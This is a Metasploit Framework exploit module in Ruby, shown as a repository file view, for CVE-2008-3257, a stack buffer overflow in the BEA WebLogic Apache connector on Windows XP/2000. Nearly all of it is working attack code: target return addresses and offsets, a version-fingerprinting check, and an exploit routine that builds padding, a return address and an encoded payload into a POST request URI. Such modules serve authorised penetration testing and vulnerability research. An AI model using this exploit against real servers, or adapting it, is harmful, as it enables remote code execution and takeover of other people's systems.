metasploit-framework/modules/exploits/windows/http/bea_weblogic_post_bof.rb

174 lines
4.1 KiB
Ruby
Raw Normal View History

2012-05-17 08:28:18 +00:00
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
HttpFingerprint = { :pattern => [ /Apache/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the BEA
Weblogic Apache plugin.
The connector fails to properly handle specially crafted HTTP POST
requests resulting in a buffer overflow due to the insecure usage
of sprintf.
At this moment this module works over Windows systems without DEP
and has been tested with Windows 2000 / XP.
},
'Author' =>
[
'KingCope', # Vulnerability Discovery and PoC
'juan vazquez', # Metasploit Module
],
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2008-3257' ],
[ 'OSVDB', '47096' ],
[ 'BID', '30273' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => true,
'Platform' => 'win',
'Payload' =>
{
'Space' => 4000,
'BadChars' => "\x00\x0d\x0a\x3f"
},
'Targets' =>
[
[ 'Automatic', {} ],
[ 'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
{
'Ret' => 0x10061f63, # push esp # ret # mod_wl_20.so
'Offset' => 4102
}
],
[ 'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
{
'Ret' => 0x10061473, # push esp # ret # mod_wl_20.so
'Offset' => 4102
}
],
],
'DisclosureDate' => 'Jul 17 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('PATH', [ true, "The URI path to a jsp or object provided by Weblogic", '/index.jsp'])
], self.class)
end
def check
res = send_request_cgi(
{
'method' => 'POST',
'uri' => datastore['PATH'],
'headers' =>
{
'Content-Length' => -1
}
})
if res and res.code == 500
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
res.body =~ /Change Number:<\/B> <I>779586/
return Exploit::CheckCode::Vulnerable
end
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
if res.body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and
res.body =~ /Change Number:<\/B> <I>616810/
return Exploit::CheckCode::Vulnerable
end
# Check for dates prior to patch release
if res.body =~ /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
build_date = Date.parse($1)
if build_date <= Date.parse("Jul 28 2008")
return Exploit::CheckCode::Appears
end
end
end
return Exploit::CheckCode::Safe
end
def exploit
# Autodetect BEA mod_wl version
my_target = get_target
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("BEA mod_weblogic not supported")
return
end
uri = datastore['PATH']
sploit = rand_text_alphanumeric(my_target['Offset']-uri.length)
sploit << [my_target.ret].pack("V")
sploit << payload.encoded
send_request_cgi(
{
'method' => 'POST',
'uri' => "#{uri} #{sploit}",
})
handler
end
def get_target
return target if target.name != 'Automatic'
res = send_request_cgi(
{
'method' => 'POST',
'uri' => datastore['PATH'],
'headers' =>
{
'Content-Length' => -1
}
})
if res and res.code == 500
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
res.body =~ /Change Number:<\/B> <I>779586/
return targets[1]
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
elsif res.body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and
res.body =~ /Change Number:<\/B> <I>616810/
return targets[2]
end
end
return nil
end
end